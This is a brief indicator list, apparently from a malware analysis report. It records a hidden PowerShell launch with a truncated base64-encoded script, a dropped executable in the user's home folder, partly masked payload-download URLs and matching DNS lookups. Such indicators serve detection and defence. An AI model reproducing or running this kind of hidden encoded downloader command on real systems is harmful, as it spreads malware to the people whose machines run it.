Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAHMAdABmAHcAcgBuAGMAeQBvAHgAPQAnAE4AcgBsAHQAZwBrAGsAcwAnADsAJABEAHQAagBwAHcAbQBrAHcAdAAgAD0AIAAnADIANwA2ACcAOwAkAEMAeABnAHYAaABtAG8AawBzAD0AJwBTAGsAbABlAHg...
- %HOMEPATH%\276.exe
- %HOMEPATH%\276.exe
- http://za####olidays.me/api.mud/oyokx-xih3-8811/
- http://ja#####ndevelopers.com/wp-content/m9yufwg62-ivbak8-8431/
- http://ja#####ndevelopers.com/cgi-sys/suspendedpage.cgi
- http://www.sh#####leighbeauty.com/subscription/9qtkw7-57djmwa46x-074306828/
- DNS ASK za####olidays.me
- DNS ASK ja#####ndevelopers.com
- DNS ASK sh#####leighbeauty.com
- DNS ASK pi###seed.com
- DNS ASK ma###scakes.com